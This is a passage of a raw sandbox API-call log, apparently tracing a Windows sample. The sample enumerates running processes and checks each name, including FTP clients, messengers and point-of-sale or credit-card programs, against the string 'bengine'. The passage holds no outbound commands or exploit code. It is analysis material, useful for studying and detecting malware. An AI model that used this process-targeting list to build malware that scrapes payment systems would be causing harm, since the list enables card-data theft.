lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0101.414] StrStrIA (lpFirst="leechftp.exe", lpSrch="bengine") returned 0x0 [0101.414] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0101.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.415] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f150 [0101.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f150, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0101.415] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0101.415] StrStrIA (lpFirst="ncftp.exe", lpSrch="bengine") returned 0x0 [0101.416] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0101.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.424] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356efe8 [0101.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x356efe8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0101.424] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0101.424] StrStrIA (lpFirst="notepad.exe", lpSrch="bengine") returned 0x0 [0101.424] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0101.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.425] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f240 [0101.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x356f240, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0101.425] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0101.425] StrStrIA (lpFirst="operamail.exe", lpSrch="bengine") returned 0x0 [0101.425] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0101.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.426] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f258 [0101.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x356f258, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0101.426] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0101.426] StrStrIA (lpFirst="pidgin.exe", lpSrch="bengine") returned 0x0 [0101.426] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.428] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f000 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f000, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0101.428] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0101.428] StrStrIA (lpFirst="scriptftp.exe", lpSrch="bengine") returned 0x0 [0101.428] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.429] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f2a0 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x356f2a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0101.429] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0101.429] StrStrIA (lpFirst="skype.exe", lpSrch="bengine") returned 0x0 [0101.429] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0101.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.430] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f570 [0101.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f570, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.431] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0101.431] StrStrIA (lpFirst="smartftp.exe", lpSrch="bengine") returned 0x0 [0101.431] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0101.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.433] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f3f0 [0101.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x356f3f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0101.433] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0101.433] StrStrIA (lpFirst="totalcmd.exe", lpSrch="bengine") returned 0x0 [0101.433] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0101.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.434] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f540 [0101.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x356f540, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0101.434] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0101.434] StrStrIA (lpFirst="trillian.exe", lpSrch="bengine") returned 0x0 [0101.434] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0101.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.436] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f558 [0101.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x356f558, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0101.436] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0101.436] StrStrIA (lpFirst="webdrive.exe", lpSrch="bengine") returned 0x0 [0101.436] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0101.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.438] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f588 [0101.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x356f588, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.438] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0101.438] StrStrIA (lpFirst="whatsapp.exe", lpSrch="bengine") returned 0x0 [0101.438] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0101.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.439] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f348 [0101.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x356f348, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0101.439] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0101.439] StrStrIA (lpFirst="winscp.exe", lpSrch="bengine") returned 0x0 [0101.439] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0101.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.440] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ed80 [0101.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357ed80, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0101.440] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0101.441] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="bengine") returned 0x0 [0101.441] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0101.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.442] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357eda0 [0101.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357eda0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0101.442] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0101.442] StrStrIA (lpFirst="active-charge.exe", lpSrch="bengine") returned 0x0 [0101.442] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0101.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.443] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f2b8 [0101.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x356f2b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0101.443] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0101.443] StrStrIA (lpFirst="accupos.exe", lpSrch="bengine") returned 0x0 [0101.443] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0101.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.445] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f438 [0101.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x356f438, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0101.445] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0101.445] StrStrIA (lpFirst="afr38.exe", lpSrch="bengine") returned 0x0 [0101.445] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0101.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.446] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f2d0 [0101.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x356f2d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0101.446] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0101.446] StrStrIA (lpFirst="aldelo.exe", lpSrch="bengine") returned 0x0 [0101.446] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0101.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.447] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x356f408 [0101.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x356f408, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0101.447] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0101.447] StrStrIA (lpFirst="ccv_server.exe", lpSrch="bengine") returned 0x0 [0101.448] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0101.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0101.458] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357edc0 [0101.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357edc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0101.458] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0101.458] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="bengine") returned 0x0 [0101.459] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0101.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.460] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f000 [0101.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357f000, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0101.460] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0101.460] StrStrIA (lpFirst="creditservice.exe", lpSrch="bengine") returned 0x0 [0101.460] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0101.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.461] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f360 [0101.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x356f360, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0101.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0101.461] StrStrIA (lpFirst="edcsvr.exe", lpSrch="bengine") returned 0x0 [0101.461] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0101.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.463] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356f378 [0101.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x356f378, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0101.463] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0101.463] StrStrIA (lpFirst="fpos.exe", lpSrch="bengine") returned 0x0 [0101.463] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0101.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.464] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f420 [0101.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x356f420, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0101.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0101.464] StrStrIA (lpFirst="isspos.exe", lpSrch="bengine") returned 0x0 [0101.464] Process32NextW 